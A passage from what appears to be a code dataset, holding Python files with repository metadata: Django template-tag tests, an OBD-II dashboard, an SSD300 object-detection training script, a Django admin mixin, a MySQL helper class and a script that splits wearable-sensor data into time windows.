        else: # DJANGO_VERSION > (1,7):
            from django.template.base import import_library
            tag_lib = import_library('testapp.tags')
        # Lexer takes an origin argument only on older versions.
        if DJANGO_VERSION > (1,9):
            lexer = Lexer(template_string)
        else:
            lexer = Lexer(template_string, self._make_origin())
        parser = Parser(lexer.tokenize())
        parser.add_library(tag_lib)
        nodelist = parser.parse()
        return nodelist.render(Context(context))
class DataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
    """Tests for the ``get_my_data`` assignment tag."""

    TEMPLATE_STRING = "<html><body>{% get_my_data 121 as my_data %}{{ my_data }}</body></html>"
    # Malformed: the ``as`` keyword is missing.
    BAD_TEMPLATE_STRING = "<html><body>{% get_my_data 121 my_data %}{{ my_data }}</body></html>"

    def test_data_template_tag(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING), "<html><body>MY DATA</body></html>")

    def test_bad_template_tag(self):
        # Omitting ``as`` must be rejected at parse time.
        with self.assertRaises(TemplateSyntaxError):
            print(self._render_html(self.BAD_TEMPLATE_STRING))
class KwargDataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
    """Tests for ``get_my_kwarg_data`` with optional keyword arguments."""

    TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 as my_data %}{{ my_data }}</body></html>"
    TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data 121 status='spam' as my_data %}{{ my_data }}</body></html>"
    TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data 121 other='eggs' as my_data %}{{ my_data }}</body></html>"
    TEMPLATE_STRING4 = "<html><body>{% get_my_kwarg_data 121 status='spam' other='eggs' as my_data %}{{ my_data }}</body></html>"
    # Unquoted kwarg values resolve against the render context.
    TEMPLATE_STRING5 = "<html><body>{% get_my_kwarg_data 121 status=spam other=eggs as my_data %}{{ my_data }}</body></html>"
    BAD_TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 my_data %}{{ my_data }}</body></html>"
    BAD_TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data %}{{ my_data }}</body></html>"
    # NOTE(review): defined but never rendered by any test.
    BAD_TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data as my_data %}{{ my_data }}</body></html>"
    BASE_HTML = "<html><body>%s</body></html>"

    def test_kwarg_data_template_tag1(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING1), self.BASE_HTML % "121:None:other")

    def test_kwarg_data_template_tag2(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING2), self.BASE_HTML % "121:spam:other")

    def test_kwarg_data_template_tag3(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING3), self.BASE_HTML % "121:None:eggs")

    def test_kwarg_data_template_tag4(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING4), self.BASE_HTML % "121:spam:eggs")

    def test_kwarg_data_template_tag5(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING5, {"spam": "eggs", "eggs": "spam"}), self.BASE_HTML % "121:eggs:spam")

    def test_bad_template_tag1(self):
        with self.assertRaises(TemplateSyntaxError):
            print(self._render_html(self.BAD_TEMPLATE_STRING1))

    def test_bad_template_tag2(self):
        with self.assertRaises(TemplateSyntaxError):
            print(self._render_html(self.BAD_TEMPLATE_STRING2))
|
en
| 0.582123
|
#:coding=utf-8: # :( # DJANGO_VERSION > (1,7):
| 2.128067
| 2
|
start_og.py
|
chan2565/obd_gui
| 0
|
6627614
|
<gh_stars>0
import obd
from obd_gui import (
    window,
    new_speed,
    new_rpm,
    new_coolant_temp,
    new_engine_load,
    new_intake_temp,
    new_throttle_pos,
    new_timing_adv,
    conn_lbl,
)

try:
    # Asynchronous connection to the OBD-II adapter.
    # connection = obd.Async(baudrate=9600)
    connection = obd.Async()

    # Pair each PID with the GUI callback that renders its value.
    watchers = (
        (obd.commands.SPEED, new_speed),
        (obd.commands.RPM, new_rpm),
        (obd.commands.COOLANT_TEMP, new_coolant_temp),
        (obd.commands.ENGINE_LOAD, new_engine_load),
        (obd.commands.INTAKE_TEMP, new_intake_temp),
        (obd.commands.THROTTLE_POS, new_throttle_pos),
        (obd.commands.TIMING_ADVANCE, new_timing_adv),
    )
    for command, callback in watchers:
        connection.watch(command, callback=callback)
    # connection.watch(obd.commands.ELM_VOLTAGE, callback=new_obd_voltage)
    # connection.watch(obd.commands.FUEL_STATUS, callback=new_fuel_status)

    # Begin polling and reflect the connection status in the GUI.
    connection.start()
    conn_lbl.configure(text=connection.status())
except Exception:
    conn_lbl.configure(text="ERROR CONNECTING")

# Hand control to the Tk event loop.
window.mainloop()
|
import obd
from obd_gui import (
    window,
    new_speed,
    new_rpm,
    new_coolant_temp,
    new_engine_load,
    new_intake_temp,
    new_throttle_pos,
    new_timing_adv,
    conn_lbl,
)

try:
    # Start async connection to OBD adapter (port auto-detected).
    # connection = obd.Async(baudrate=9600)
    connection = obd.Async()
    # Set up codes to watch, each with its GUI-updating callback.
    connection.watch(obd.commands.SPEED, callback=new_speed)
    connection.watch(obd.commands.RPM, callback=new_rpm)
    connection.watch(obd.commands.COOLANT_TEMP, callback=new_coolant_temp)
    connection.watch(obd.commands.ENGINE_LOAD, callback=new_engine_load)
    connection.watch(obd.commands.INTAKE_TEMP, callback=new_intake_temp)
    connection.watch(obd.commands.THROTTLE_POS, callback=new_throttle_pos)
    connection.watch(obd.commands.TIMING_ADVANCE, callback=new_timing_adv)
    # connection.watch(obd.commands.ELM_VOLTAGE, callback=new_obd_voltage)
    # connection.watch(obd.commands.FUEL_STATUS, callback=new_fuel_status)
    # Start monitoring and show the connection status in the GUI.
    connection.start()
    conn_lbl.configure(text=connection.status())
except Exception:
    # Any failure (no adapter, bad port, ...) is surfaced in the label.
    conn_lbl.configure(text="ERROR CONNECTING")

# Start display: hand control to the Tk event loop.
window.mainloop()
|
en
| 0.548562
|
# Start async connection to OBD adapter # connection = obd.Async(baudrate=9600) # Set up codes to watch with callbacks # connection.watch(obd.commands.ELM_VOLTAGE, callback=new_obd_voltage) # connection.watch(obd.commands.FUEL_STATUS, callback=new_fuel_status) # Start monitoring # Start display
| 2.440167
| 2
|
deep-learning-for-image-processing-master/pytorch_object_detection/ssd/train_ssd300.py
|
zpwithme/zzzzpppp
| 0
|
6627615
|
<reponame>zpwithme/zzzzpppp
import os
import datetime
import torch
import transforms
from my_dataset import VOC2012DataSet
from src import SSD300, Backbone
import train_utils.train_eval_utils as utils
from train_utils import get_coco_api_from_dataset
def create_model(num_classes=21, device=torch.device('cpu')):
    """Build an SSD300 detector and load NVIDIA's pretrained weights.

    Args:
        num_classes: number of output classes including background
            (default 21: 20 PASCAL VOC classes + background).
        device: torch device the checkpoint is mapped to and the model
            is moved onto.

    Returns:
        The SSD300 model on ``device``.

    Raises:
        FileNotFoundError: if the pretrained checkpoint is missing.
    """
    # https://download.pytorch.org/models/resnet50-19c8e357.pth
    # pre_train_path = "./src/resnet50.pth"
    model = SSD300(backbone=Backbone(), num_classes=num_classes)

    # https://ngc.nvidia.com/catalog/models -> search ssd -> download FP32
    pre_ssd_path = "./src/nvidia_ssdpyt_fp32.pt"
    if not os.path.exists(pre_ssd_path):
        raise FileNotFoundError("nvidia_ssdpyt_fp32.pt not find in {}".format(pre_ssd_path))
    pre_weights_dict = torch.load(pre_ssd_path, map_location=device)["model"]

    # Drop the class-prediction ("conf") weights: they depend on
    # num_classes.  The box-regression weights are class-agnostic and
    # can be reused as-is.
    reusable_weights = {
        k: v for k, v in pre_weights_dict.items() if "conf" not in k.split(".")
    }
    missing_keys, unexpected_keys = model.load_state_dict(reusable_weights, strict=False)
    if missing_keys or unexpected_keys:
        print("missing_keys: ", missing_keys)
        print("unexpected_keys: ", unexpected_keys)
    return model.to(device)
def main(parser_data):
    """Train SSD300 on VOC2012 and evaluate after every epoch.

    Args:
        parser_data: parsed argparse namespace providing device, num_classes,
            data_path, batch_size, resume, start_epoch and epochs.
    """
    device = torch.device(parser_data.device if torch.cuda.is_available() else "cpu")
    print("Using {} device training.".format(device.type))

    if not os.path.exists("save_weights"):
        os.mkdir("save_weights")

    # One results file per run, named by timestamp.
    results_file = "results{}.txt".format(datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))

    data_transform = {
        "train": transforms.Compose([transforms.SSDCropping(),
                                     transforms.Resize(),
                                     transforms.ColorJitter(),
                                     transforms.ToTensor(),
                                     transforms.RandomHorizontalFlip(),
                                     transforms.Normalization(),
                                     transforms.AssignGTtoDefaultBox()]),
        "val": transforms.Compose([transforms.Resize(),
                                   transforms.ToTensor(),
                                   transforms.Normalization()])
    }

    # Check that the VOC root actually contains a VOCdevkit folder.
    VOC_root = parser_data.data_path
    if os.path.exists(os.path.join(VOC_root, "VOCdevkit")) is False:
        raise FileNotFoundError("VOCdevkit dose not in path:'{}'.".format(VOC_root))

    train_dataset = VOC2012DataSet(VOC_root, data_transform['train'], train_set='train.txt')
    # batch_size must be greater than 1 during training.
    batch_size = parser_data.batch_size
    assert batch_size > 1, "batch size must be greater than 1"
    # Drop the final batch when it would hold a single sample.
    drop_last = True if len(train_dataset) % batch_size == 1 else False
    nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8])  # number of workers
    print('Using %g dataloader workers' % nw)
    train_data_loader = torch.utils.data.DataLoader(train_dataset,
                                                    batch_size=batch_size,
                                                    shuffle=True,
                                                    num_workers=nw,
                                                    collate_fn=train_dataset.collate_fn,
                                                    drop_last=drop_last)

    val_dataset = VOC2012DataSet(VOC_root, data_transform['val'], train_set='val.txt')
    val_data_loader = torch.utils.data.DataLoader(val_dataset,
                                                  batch_size=batch_size,
                                                  shuffle=False,
                                                  num_workers=nw,
                                                  collate_fn=train_dataset.collate_fn)

    # BUGFIX: use the namespace passed to main() instead of the module-level
    # `args` global, so main() also works when called programmatically.
    # +1 accounts for the background class.
    model = create_model(num_classes=parser_data.num_classes + 1, device=device)

    # define optimizer
    params = [p for p in model.parameters() if p.requires_grad]
    optimizer = torch.optim.SGD(params, lr=0.0005,
                                momentum=0.9, weight_decay=0.0005)
    # learning rate scheduler
    lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer,
                                                   step_size=5,
                                                   gamma=0.3)

    # Resume from a saved checkpoint if one was given.
    if parser_data.resume != "":
        checkpoint = torch.load(parser_data.resume)
        model.load_state_dict(checkpoint['model'])
        optimizer.load_state_dict(checkpoint['optimizer'])
        lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
        parser_data.start_epoch = checkpoint['epoch'] + 1
        print("the training process from epoch{}...".format(parser_data.start_epoch))

    train_loss = []
    learning_rate = []
    val_map = []

    # Build the COCO-style ground truth once so each evaluation round does
    # not reload it.
    val_data = get_coco_api_from_dataset(val_data_loader.dataset)
    for epoch in range(parser_data.start_epoch, parser_data.epochs):
        mean_loss, lr = utils.train_one_epoch(model=model, optimizer=optimizer,
                                              data_loader=train_data_loader,
                                              device=device, epoch=epoch,
                                              print_freq=50)
        train_loss.append(mean_loss.item())
        learning_rate.append(lr)

        # update learning rate
        lr_scheduler.step()

        coco_info = utils.evaluate(model=model, data_loader=val_data_loader,
                                   device=device, data_set=val_data)

        # Append the COCO metrics, mean loss and learning rate to the results file.
        with open(results_file, "a") as f:
            result_info = [str(round(i, 4)) for i in coco_info + [mean_loss.item()]] + [str(round(lr, 6))]
            txt = "epoch:{} {}".format(epoch, ' '.join(result_info))
            f.write(txt + "\n")

        val_map.append(coco_info[1])  # pascal mAP

        # save weights
        save_files = {
            'model': model.state_dict(),
            'optimizer': optimizer.state_dict(),
            'lr_scheduler': lr_scheduler.state_dict(),
            'epoch': epoch}
        torch.save(save_files, "./save_weights/ssd300-{}.pth".format(epoch))

    # plot loss and lr curve
    if len(train_loss) != 0 and len(learning_rate) != 0:
        from plot_curve import plot_loss_and_lr
        plot_loss_and_lr(train_loss, learning_rate)

    # plot mAP curve
    if len(val_map) != 0:
        from plot_curve import plot_map
        plot_map(val_map)
# inputs = torch.rand(size=(2, 3, 300, 300))
# output = model(inputs)
# print(output)
if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser(description=__doc__)
    # training device
    parser.add_argument('--device', default='cuda:0', help='device')
    # number of object classes to detect, excluding background
    parser.add_argument('--num_classes', default=20, type=int, help='num_classes')
    # root directory of the training data (the folder containing VOCdevkit)
    parser.add_argument('--data-path', default='./', help='dataset')
    # directory where checkpoints are written
    parser.add_argument('--output-dir', default='./save_weights', help='path where to save')
    # checkpoint to resume training from, if any
    parser.add_argument('--resume', default='', type=str, help='resume from checkpoint')
    # epoch number to start training at
    parser.add_argument('--start_epoch', default=0, type=int, help='start epoch')
    # total number of epochs to train
    parser.add_argument('--epochs', default=15, type=int, metavar='N',
                        help='number of total epochs to run')
    # training batch size
    parser.add_argument('--batch_size', default=4, type=int, metavar='N',
                        help='batch size when training.')

    args = parser.parse_args()
    print(args)

    # create the checkpoint directory if it does not exist yet
    if not os.path.exists(args.output_dir):
        os.makedirs(args.output_dir)

    main(args)
|
import os
import datetime
import torch
import transforms
from my_dataset import VOC2012DataSet
from src import SSD300, Backbone
import train_utils.train_eval_utils as utils
from train_utils import get_coco_api_from_dataset
def create_model(num_classes=21, device=torch.device('cpu')):
# https://download.pytorch.org/models/resnet50-19c8e357.pth
# pre_train_path = "./src/resnet50.pth"
backbone = Backbone()
model = SSD300(backbone=backbone, num_classes=num_classes)
# https://ngc.nvidia.com/catalog/models -> search ssd -> download FP32
pre_ssd_path = "./src/nvidia_ssdpyt_fp32.pt"
if os.path.exists(pre_ssd_path) is False:
raise FileNotFoundError("nvidia_ssdpyt_fp32.pt not find in {}".format(pre_ssd_path))
pre_model_dict = torch.load(pre_ssd_path, map_location=device)
pre_weights_dict = pre_model_dict["model"]
# 删除类别预测器权重,注意,回归预测器的权重可以重用,因为不涉及num_classes
del_conf_loc_dict = {}
for k, v in pre_weights_dict.items():
split_key = k.split(".")
if "conf" in split_key:
continue
del_conf_loc_dict.update({k: v})
missing_keys, unexpected_keys = model.load_state_dict(del_conf_loc_dict, strict=False)
if len(missing_keys) != 0 or len(unexpected_keys) != 0:
print("missing_keys: ", missing_keys)
print("unexpected_keys: ", unexpected_keys)
return model.to(device)
def main(parser_data):
    """Train SSD300 on VOC2012 and evaluate after every epoch.

    Args:
        parser_data: parsed argparse namespace providing device, num_classes,
            data_path, batch_size, resume, start_epoch and epochs.
    """
    device = torch.device(parser_data.device if torch.cuda.is_available() else "cpu")
    print("Using {} device training.".format(device.type))

    if not os.path.exists("save_weights"):
        os.mkdir("save_weights")

    # One results file per run, named by timestamp.
    results_file = "results{}.txt".format(datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))

    data_transform = {
        "train": transforms.Compose([transforms.SSDCropping(),
                                     transforms.Resize(),
                                     transforms.ColorJitter(),
                                     transforms.ToTensor(),
                                     transforms.RandomHorizontalFlip(),
                                     transforms.Normalization(),
                                     transforms.AssignGTtoDefaultBox()]),
        "val": transforms.Compose([transforms.Resize(),
                                   transforms.ToTensor(),
                                   transforms.Normalization()])
    }

    # Check that the VOC root actually contains a VOCdevkit folder.
    VOC_root = parser_data.data_path
    if os.path.exists(os.path.join(VOC_root, "VOCdevkit")) is False:
        raise FileNotFoundError("VOCdevkit dose not in path:'{}'.".format(VOC_root))

    train_dataset = VOC2012DataSet(VOC_root, data_transform['train'], train_set='train.txt')
    # batch_size must be greater than 1 during training.
    batch_size = parser_data.batch_size
    assert batch_size > 1, "batch size must be greater than 1"
    # Drop the final batch when it would hold a single sample.
    drop_last = True if len(train_dataset) % batch_size == 1 else False
    nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8])  # number of workers
    print('Using %g dataloader workers' % nw)
    train_data_loader = torch.utils.data.DataLoader(train_dataset,
                                                    batch_size=batch_size,
                                                    shuffle=True,
                                                    num_workers=nw,
                                                    collate_fn=train_dataset.collate_fn,
                                                    drop_last=drop_last)

    val_dataset = VOC2012DataSet(VOC_root, data_transform['val'], train_set='val.txt')
    val_data_loader = torch.utils.data.DataLoader(val_dataset,
                                                  batch_size=batch_size,
                                                  shuffle=False,
                                                  num_workers=nw,
                                                  collate_fn=train_dataset.collate_fn)

    # BUGFIX: use the namespace passed to main() instead of the module-level
    # `args` global, so main() also works when called programmatically.
    # +1 accounts for the background class.
    model = create_model(num_classes=parser_data.num_classes + 1, device=device)

    # define optimizer
    params = [p for p in model.parameters() if p.requires_grad]
    optimizer = torch.optim.SGD(params, lr=0.0005,
                                momentum=0.9, weight_decay=0.0005)
    # learning rate scheduler
    lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer,
                                                   step_size=5,
                                                   gamma=0.3)

    # Resume from a saved checkpoint if one was given.
    if parser_data.resume != "":
        checkpoint = torch.load(parser_data.resume)
        model.load_state_dict(checkpoint['model'])
        optimizer.load_state_dict(checkpoint['optimizer'])
        lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
        parser_data.start_epoch = checkpoint['epoch'] + 1
        print("the training process from epoch{}...".format(parser_data.start_epoch))

    train_loss = []
    learning_rate = []
    val_map = []

    # Build the COCO-style ground truth once so each evaluation round does
    # not reload it.
    val_data = get_coco_api_from_dataset(val_data_loader.dataset)
    for epoch in range(parser_data.start_epoch, parser_data.epochs):
        mean_loss, lr = utils.train_one_epoch(model=model, optimizer=optimizer,
                                              data_loader=train_data_loader,
                                              device=device, epoch=epoch,
                                              print_freq=50)
        train_loss.append(mean_loss.item())
        learning_rate.append(lr)

        # update learning rate
        lr_scheduler.step()

        coco_info = utils.evaluate(model=model, data_loader=val_data_loader,
                                   device=device, data_set=val_data)

        # Append the COCO metrics, mean loss and learning rate to the results file.
        with open(results_file, "a") as f:
            result_info = [str(round(i, 4)) for i in coco_info + [mean_loss.item()]] + [str(round(lr, 6))]
            txt = "epoch:{} {}".format(epoch, ' '.join(result_info))
            f.write(txt + "\n")

        val_map.append(coco_info[1])  # pascal mAP

        # save weights
        save_files = {
            'model': model.state_dict(),
            'optimizer': optimizer.state_dict(),
            'lr_scheduler': lr_scheduler.state_dict(),
            'epoch': epoch}
        torch.save(save_files, "./save_weights/ssd300-{}.pth".format(epoch))

    # plot loss and lr curve
    if len(train_loss) != 0 and len(learning_rate) != 0:
        from plot_curve import plot_loss_and_lr
        plot_loss_and_lr(train_loss, learning_rate)

    # plot mAP curve
    if len(val_map) != 0:
        from plot_curve import plot_map
        plot_map(val_map)
# inputs = torch.rand(size=(2, 3, 300, 300))
# output = model(inputs)
# print(output)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description=__doc__)
# 训练设备类型
parser.add_argument('--device', default='cuda:0', help='device')
# 检测的目标类别个数,不包括背景
parser.add_argument('--num_classes', default=20, type=int, help='num_classes')
# 训练数据集的根目录(VOCdevkit)
parser.add_argument('--data-path', default='./', help='dataset')
# 文件保存地址
parser.add_argument('--output-dir', default='./save_weights', help='path where to save')
# 若需要接着上次训练,则指定上次训练保存权重文件地址
parser.add_argument('--resume', default='', type=str, help='resume from checkpoint')
# 指定接着从哪个epoch数开始训练
parser.add_argument('--start_epoch', default=0, type=int, help='start epoch')
# 训练的总epoch数
parser.add_argument('--epochs', default=15, type=int, metavar='N',
help='number of total epochs to run')
# 训练的batch size
parser.add_argument('--batch_size', default=4, type=int, metavar='N',
help='batch size when training.')
args = parser.parse_args()
print(args)
# 检查保存权重文件夹是否存在,不存在则创建
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
main(args)
|
zh
| 0.464735
|
# https://download.pytorch.org/models/resnet50-19c8e357.pth # pre_train_path = "./src/resnet50.pth" # https://ngc.nvidia.com/catalog/models -> search ssd -> download FP32 # 删除类别预测器权重,注意,回归预测器的权重可以重用,因为不涉及num_classes # check voc root # 注意训练时,batch_size必须大于1 # 防止最后一个batch_size=1,如果最后一个batch_size=1就舍去 # number of workers # define optimizer # learning rate scheduler # 如果指定了上次训练保存的权重文件地址,则接着上次结果接着训练 # 提前加载验证集数据,以免每次验证时都要重新加载一次数据,节省时间 # update learning rate # write into txt # 写入的数据包括coco指标还有loss和learning rate # pascal mAP # save weights # plot loss and lr curve # plot mAP curve # inputs = torch.rand(size=(2, 3, 300, 300)) # output = model(inputs) # print(output) # 训练设备类型 # 检测的目标类别个数,不包括背景 # 训练数据集的根目录(VOCdevkit) # 文件保存地址 # 若需要接着上次训练,则指定上次训练保存权重文件地址 # 指定接着从哪个epoch数开始训练 # 训练的总epoch数 # 训练的batch size # 检查保存权重文件夹是否存在,不存在则创建
| 2.445689
| 2
|
shop/admin/mixins.py
|
dwx9/test
| 1
|
6627616
|
<filename>shop/admin/mixins.py<gh_stars>1-10
#-*- coding: utf-8 -*-
from django import forms
class LocalizeDecimalFieldsForm(forms.ModelForm):
    """ModelForm that switches every decimal/float field to localized input."""

    def __new__(cls, *args, **kwargs):
        # Enable localization on the class's shared base_fields before the
        # instance is handed back.
        instance = super(LocalizeDecimalFieldsForm, cls).__new__(cls)
        if hasattr(instance, 'base_fields'):
            for form_field in instance.base_fields.values():
                if isinstance(form_field, (forms.DecimalField, forms.FloatField)):
                    form_field.localize = True
                    form_field.widget.is_localized = True
        return instance
class LocalizeDecimalFieldsMixin(object):
    """Mixin for admin classes (admin.ModelAdmin, admin.TabularInline, ...)
    that localizes the input fields of DecimalField model attributes in the
    admin interface.

    If a subclass overrides the ``form`` attribute, that form must derive
    from LocalizeDecimalFieldsForm rather than plain forms.ModelForm.
    """

    form = LocalizeDecimalFieldsForm
|
<filename>shop/admin/mixins.py<gh_stars>1-10
#-*- coding: utf-8 -*-
from django import forms
class LocalizeDecimalFieldsForm(forms.ModelForm):
def __new__(cls, *args, **kwargs):
new_class = super(LocalizeDecimalFieldsForm, cls).__new__(cls)
if hasattr(new_class, 'base_fields'):
for field in new_class.base_fields.values():
if isinstance(field, (forms.DecimalField, forms.FloatField)):
field.localize = True
field.widget.is_localized = True
return new_class
class LocalizeDecimalFieldsMixin(object):
'''
To be used as a mixin for classes derived from admin.ModelAdmin,
admin.TabularInline, etc. which localizes the input fields for models
of type DecimalField in the admin interface.
If your class derived from ModelAdmin wants to override the form attribute,
make sure that this form is derived from LocalizeDecimalFieldsForm and not
from forms.ModelForm.
'''
form = LocalizeDecimalFieldsForm
|
en
| 0.886119
|
#-*- coding: utf-8 -*- To be used as a mixin for classes derived from admin.ModelAdmin, admin.TabularInline, etc. which localizes the input fields for models of type DecimalField in the admin interface. If your class derived from ModelAdmin wants to override the form attribute, make sure that this form is derived from LocalizeDecimalFieldsForm and not from forms.ModelForm.
| 2.039436
| 2
|
dbutil/dbutil.py
|
Dannywanxyz/aladin
| 0
|
6627617
|
<gh_stars>0
#!/usr/bin/env python
#encoding:utf8
import json
import time,random
import datetime
import MySQLdb
import MySQLdb.cursors
class DB:
conn = None
db = None
host = None
def __init__(self, host, mysql_user, mysql_pass, mysql_db):
self.host = host
self.mysql_user = mysql_user
self.mysql_pass = <PASSWORD>
self.mysql_db = mysql_db
def connect(self):
self.conn = MySQLdb.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset="utf8", connect_timeout=600, compress=True,cursorclass = MySQLdb.cursors.DictCursor)
self.conn.autocommit(True)
def execute(self, sql):
global cursor
try:
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
try:
cursor.close()
self.conn.close()
except:
pass
time.sleep(1)
try:
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
time.sleep(2)
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
return cursor
|
#!/usr/bin/env python
#encoding:utf8
import json
import time,random
import datetime
import MySQLdb
import MySQLdb.cursors
class DB:
conn = None
db = None
host = None
def __init__(self, host, mysql_user, mysql_pass, mysql_db):
self.host = host
self.mysql_user = mysql_user
self.mysql_pass = <PASSWORD>
self.mysql_db = mysql_db
def connect(self):
self.conn = MySQLdb.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset="utf8", connect_timeout=600, compress=True,cursorclass = MySQLdb.cursors.DictCursor)
self.conn.autocommit(True)
def execute(self, sql):
global cursor
try:
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
try:
cursor.close()
self.conn.close()
except:
pass
time.sleep(1)
try:
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
time.sleep(2)
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
return cursor
|
en
| 0.137559
|
#!/usr/bin/env python #encoding:utf8
| 2.946452
| 3
|
BFRB_Detection_Data/pipeline/1-_WindowSplit.py
|
Bhorda/BFRBAnticipationDataset
| 3
|
6627618
|
<reponame>Bhorda/BFRBAnticipationDataset
import numpy as np
import pandas as ps
import math
import sys
import random
### Negative windows
# prediction window and labeled window length in seconds
directory = sys.argv[1]
xSize = int(sys.argv[2])   # xwindow size
ySize = int(sys.argv[3])   # ywindow size
uID = sys.argv[4]          # participant ID
norm = sys.argv[5]         # normalisation type: zscore/minmax

timecodes = ps.read_csv(directory + 'timestamps.csv')
startRecording = int(timecodes['start'][0])
endRecording = int(timecodes['end'][0])

listStart = timecodes['start'][1:].tolist()
listEnd = timecodes['end'][1:].tolist()
listHand = timecodes['hand'][1:].tolist()
listLabel = timecodes['label'][1:].tolist()
listStage = timecodes['stage'][1:].tolist()

# Timestamps after row 0 are written as minutes.seconds (mm.ss); convert each
# to an absolute epoch in milliseconds, offset from the recording start.
for idx in range(len(listStart)):
    whole_minutes = math.floor(listStart[idx])
    listStart[idx] = int(startRecording + whole_minutes * 60 * 1000 + (listStart[idx] - whole_minutes) * 100 * 1000)
    whole_minutes = math.floor(listEnd[idx])
    listEnd[idx] = int(startRecording + whole_minutes * 60 * 1000 + (listEnd[idx] - whole_minutes) * 100 * 1000)

# Tabulate the behaviour intervals and keep only the labelled rows.
dfTimestamps = ps.DataFrame(list(zip(listStart, listEnd, listHand, listLabel, listStage)), columns=['start', 'end', 'hand', 'label', 'stage'])
dfTimestamps = dfTimestamps.replace(np.nan, '', regex=True)
dfTimestamps = dfTimestamps.loc[(dfTimestamps['label'] != '')]
def GenerateNegativeWindows():
    """Cut one negative (behaviour-free) window per labelled behaviour.

    For each labelled behaviour a random second of the recording is drawn
    whose span does not overlap any behaviour interval; the acc/gyr/hrm
    samples in [mark - xSize, mark + ySize] seconds are then written to
    per-sensor CSV files under `windows/`.
    """
    sensorDataAcc = ps.read_csv(directory + f'acc{norm}.csv')
    sensorDataGyr = ps.read_csv(directory + f'gyr{norm}.csv')
    sensorDataHrm = ps.read_csv(directory + f'hrm{norm}.csv')
    sensorDataPpg = ps.read_csv(directory + 'ppgLabeled.csv')  # ppg processed separately

    def _dump_window(sensor_frame, sensor_name, mark, window_index):
        # Slice [mark - xSize, mark + ySize] (milliseconds) and export it.
        window = sensor_frame.loc[(sensor_frame['timestamp'] >= mark - xSize * 1000)
                                  & (sensor_frame['timestamp'] <= mark + ySize * 1000)]
        window = window.drop('hand', axis=1)  # non-inplace: avoids chained-assignment warning
        window.to_csv(f'{directory}windows/{uID}_{sensor_name}_-_{window_index}.csv', index=False)

    for i in range(len(dfTimestamps)):
        wIndex = i + 1
        check = True
        while check:
            # BUGFIX: randrange() requires integer bounds in Python 3; the
            # original passed floats (startRecording / 1000) which raises.
            mark = random.randrange(startRecording // 1000, endRecording // 1000, 1) * 1000
            if mark < startRecording + xSize * 1000:
                continue
            for j in dfTimestamps.itertuples():
                if mark > j[1] and mark < j[2]:
                    break  # mark falls inside a behaviour period: resample
                elif mark + ySize * 1000 > j[1] and mark + ySize * 1000 < j[2]:
                    break  # labelled window would overlap a behaviour: resample
            else:
                # BUGFIX: only accept the mark when the loop finished without
                # a break; previously `check = False` ran unconditionally, so
                # overlapping marks were never resampled.
                check = False
        _dump_window(sensorDataAcc, 'acc', mark, wIndex)
        _dump_window(sensorDataGyr, 'gyr', mark, wIndex)
        _dump_window(sensorDataHrm, 'hrm', mark, wIndex)


GenerateNegativeWindows()
# # generate positive and negative windows of length
# def GeneratePositiveWindows(sensorType):
# sensorData = ps.read_csv(directory + sensorType + 'Labeled.csv')
# window = ps.DataFrame()
# wIndex = 1
# lastTuple = (listStart[0],listEnd[0])
# for i in dfTimestamps.itertuples():
# if i[1] - xSize * 1000 < startRecording or i[4] == -1:
# continue
# # If behaviour not as long as y window
# # if i[2]-i[1] < ySize * 1000:
# # continue
# window = sensorData.loc[(sensorData['timestamp'] >= i[1] - xSize * 1000) & (sensorData['timestamp'] <= i[2] + ySize * 1000)]
# print(i)
# if i[1] - lastTuple[1] > xSize * 1000:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_clean' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_clean.csv', index=False)
# else:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_dirty' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_dirty.csv', index=False)
# wIndex += 1
# # f'Window_{wIndex}_{i[4]}_clean.csv'
# GeneratePositiveWindows('acc')
|
import numpy as np
import pandas as ps
import math
import sys
import random
### Negative windows
# prediction window and labeled window length in seconds
directory = sys.argv[1]
xSize = int(sys.argv[2]) # xwindow size
ySize = int(sys.argv[3]) # ywindow size
uID = sys.argv[4] # participant ID
norm = sys.argv[5] # normalisation type: zscore/minmax
timecodes = ps.read_csv(directory + 'timestamps.csv')
startRecording = int(timecodes['start'][0])
endRecording = int(timecodes['end'][0])
listStart = timecodes['start'][1:].tolist()
